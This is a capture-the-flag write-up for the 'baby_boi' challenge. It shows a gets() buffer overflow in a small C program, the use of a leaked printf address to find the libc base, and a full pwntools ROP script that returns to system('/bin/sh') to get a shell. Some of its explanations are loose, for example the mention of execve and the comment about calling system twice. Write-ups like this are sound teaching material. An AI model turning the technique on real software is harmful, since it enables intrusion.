# Baby_boi 50 PWN

# Summary 

With a buff overflow, rop to bin/sh

1. Identify Buffer Overflow
2. Identify provided address as printf 
3. Get address of /bin/sh from libc
4. Get address of execve from libc
5. Get address of printf from libc
6. Get address of RDI Gadget
6. Craft an exploit


# code analyses
This is a x64 binary

```ruby

#include <stdio.h>
#include <stdlib.h>

int main(int argc, char **argv[]) {
  setvbuf(stdout, NULL, _IONBF, 0);
  setvbuf(stdin, NULL, _IONBF, 0);
  setvbuf(stderr, NULL, _IONBF, 0);

  char buf[32];
  printf("Hello!\n");
  printf("Here I am: %p\n", printf);
  gets(buf);
}
```
# Buffer Overflow
Firstly, we see a simple buffer overflow, with the gets function, failing to validate buf size. 
This will be the entry point in our program.

# Running the program

Running the program simply returns a memory address, that changes every  time. 

![ALT](Level 1/baby_boy/Images/Capture.PNG)

# Identify provided address 
Next, we want to know what that memory address is referencing.
Using GDB, set a break point at puts, and step through the program, until the address prints to the screen.
Then, taking that address and showing the contents of this address, within GDB, using the x/s flag, we see it is a printf function.

![ALT](Level 1/baby_boy/Images/Capture1.PNG)

# Get /bin/sh address
Next we will confirm the use of /bin/sh in the library. 
Because this binary is dynamically linked, the libc comes separate. 
We will use a tool called one_gadget to search the libc for /bin/sh.


![ALT](Level 1/baby_boy/Images/Capture2.PNG)

As you can see, execve(bin/sh) is present in the library. 

# Get execve memory address
Now lets get the libc address of execve. 

We use  readelf -s (display symbol chart)

```ruby
  1491: 00000000000e4e30    33 FUNC    WEAK   DEFAULT   13 execve@@GLIBC_2.2.5
```
0xe4e30 is the address of execve (execute program function)

# Get printf address

Next we find the address of printf within the library.

```ruby
readelf -s libc-2.27.so | grep printf

627: 0000000000064e80   195 FUNC    GLOBAL DEFAULT   13 printf@@GLIBC_2.2.5
```
 0x64e80 is the provided address

# Get address of RDI ROPgadget
As this is a x64 architecture, we will need to use RDI to pass args to the stack. 
```ruby
ROPgadget --binary baby_boi | grep rdi
```
0x400793 is our address
# Craft an exploit

Here, we are actually going to use a ROP module in pwntools, that allows us to auto extract the symbols(functions)
that we need.

```ruby
#!/usr/bin/python

from pwn import *

#p = remote('pwn.chal.csaw.io', 1005)

p = process('./baby_boi')

libc = ELF("libc-2.27.so")

p.recvuntil("am: ")

addr_printf = int(p.recvuntil("\n").strip(),16)         # recieve provided address
libc.address = addr_printf - libc.symbols["printf"]     # find printf address, and calculate base address
system = p64(libc.symbols["system"])                    # get address of system
binsh = p64(libc.search("/bin/sh").next())              # search libc for bin/sh and store address
rdi = p64(0x400793)                                     # pop rdi

p.sendline("A"*40 + system + rdi + binsh + system)      # Call system twice, to avoide stack error
p.interactive()
```




# Gives shell access



